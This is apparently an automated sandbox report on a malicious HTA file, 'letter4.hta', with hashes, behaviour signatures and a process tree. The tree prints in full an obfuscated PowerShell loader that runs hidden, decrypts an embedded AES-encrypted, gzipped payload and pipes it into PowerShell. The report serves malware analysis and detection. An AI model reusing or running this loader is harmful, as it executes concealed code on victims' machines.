Resubmissions

21-01-2025 13:39

250121-qx27kswrck 10

21-01-2025 11:57

250121-n4kvrsskfv 10

21-01-2025 11:43

250121-nvpglaslfq 10

21-01-2025 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    21-01-2025 11:26

General

  • Target

    163.5.169.28/letter4.hta

  • Size

    1.1MB

  • MD5

    4faa006670aeb4acdc9bc979a6d7cfa8

  • SHA1

    e9766a98e5c721b6f5f291ac2a0360f3e6aa483f

  • SHA256

    711f4c0c6e9d5433f7d658e6c7a6d40e73347f08afc5285af1f099e7333e5933

  • SHA512

    bcb1ac0b92359cee60650e1e630f33098fa8034582844e05d0d86e36010ada984bd21bd8cc75b59844bf5d847778257b9e0de1095cc2b0c54d02f0faeca94ed5

  • SSDEEP

    1536:/QE0zRmrv9m662wDcNzCYWKt3umr/l1vcmafSIm+lIWFjPP2txVUtEMAamHlvNKJ:4Eprv9m66DezR3K

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\letter4.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1272
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2452
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2508
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $XUVQK = 'AAAAAAAAAAAAAAAAAAAAACdNL48o48Hgk9rRcp6W2sCMFnSYiOhmyRPptxpXvX8i5dX53Ny/gHXnFtYWA2f50x7eQJN9zfaVym86a3cSYyV0H/cG1d6f0+5jQIdKs2lQg9TnPHJ/FXe5xA7YgsOWcs1KzAkddSZJqXMUeNIoRq7l80FAGXtfXn18nKedfR+4PIHk/IFfjPs2sClqITh00E0XYf18xFPM/XFTDM86wYPrUYE/kZdQ/0N0pl+mn17lajAkom4+RFmtDK8rjW1XeCCnCjLk/gAe1VsV7T8/4tTh78L8loLFSun03NSFXND8ow8SKHIGcPJA1p1l50jZcJtv/zyg3vgBh+2XSTFSuDUk51K2oPhiRbebsARirsunFjkFULB+wtmwBdgsQa7zVbgRHP4QUwvrfpZvF6FA5P0sbPhwruvP/MQ0FrO/FDxxqNZZz71nuZjoTCBMpgxI/tH4l4odKD56F2kM88zjrBKKxwUfiuGy8VUw8vomeQi1jCOb7Zy6AAwjqeW49iIavx54u8x9lvXIkbR4PZ5hOiiAmFEmjSIAsfl3PyOc4DtTJPPf8pBX28bBIo7K6eQVyuY5M8V9E8bx0v9Zq5Ek56QSjo7msZC9v6HkhiU5WZYEki8bqpUFTaU7dir3+jedVt81HPwqRrPeaFwpsclKEo4hCjJCcL4YJ94Gm/lXf0ozhriOvdKxOxt5caW/8B74XD4NEDqg/9EHMq8SU7EqFpu0xBnoTXD+JsVNJ64X3pyVliyWG8d4CPS8kTrHjpJGvQDhaPBLAk03vHhNDriqjtBQNE8adtvXF7GzDzg9yMxqkevbNhK0qYw4dg7xnzna5BwU3lSBD2UbP4FVc/LWWBOTiAeB50OG22Wv2peQzS80S0N8aFOlVyqkoIan/y46zD+s08qrYPS0fyoTXE8Qx1CanodkUbHS5pKXIrhZmvt806bqjmSKQC3Xpfe4ywkiWVDYUe85DyHJRoNP/Mq9uLPa7G2hWHRRuZlua0hCqMP6N9R8DKT4bpXUHdRJ8Bze0g==';$XKUhju = 'TWxEU0RheUxtaHFtUHZSWkp3QXpGb05Ea2p3S1VienM=';$gFBxoG = New-Object 'System.Security.Cryptography.AesManaged';$gFBxoG.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gFBxoG.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gFBxoG.BlockSize = 128;$gFBxoG.KeySize = 256;$gFBxoG.Key = [System.Convert]::FromBase64String($XKUhju);$QZbBy = [System.Convert]::FromBase64String($XUVQK);$OMfLzbUQ = $QZbBy[0..15];$gFBxoG.IV = $OMfLzbUQ;$aukKEQozf = $gFBxoG.CreateDecryptor();$MjXyOGXoj = $aukKEQozf.TransformFinalBlock($QZbBy, 16, $QZbBy.Length - 16);$gFBxoG.Dispose();$OVmXt = New-Object System.IO.MemoryStream( , $MjXyOGXoj );$AAjdaJc = New-Object System.IO.MemoryStream;$EXEKFdeJK = New-Object System.IO.Compression.GzipStream $OVmXt, ([IO.Compression.CompressionMode]::Decompress);$EXEKFdeJK.CopyTo( $AAjdaJc );$EXEKFdeJK.Close();$OVmXt.Close();[byte[]] $TGgZoN = $AAjdaJc.ToArray();$QHAGIWQ = [System.Text.Encoding]::UTF8.GetString($TGgZoN);$QHAGIWQ
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2784
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2476

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QN9FKAKMY5WGAI3F5BAU.temp

    Filesize

    7KB

    MD5

    286b0793465785dd4d7909434025982d

    SHA1

    4f3bf914467d6ce48c38d7afa64af42ff969d7ed

    SHA256

    09922cd1aaa5006e8ad953aacaf79d2bb5b9325131ecfd62c9cef127a5bd6966

    SHA512

    0f2b0d6e9357826751f928e313fb994ef21589114cfaa6f2f53f03de15e7ef324a29f9b98644f808af37de4579284c5ea258ef20596e6078d55d260381bd12f1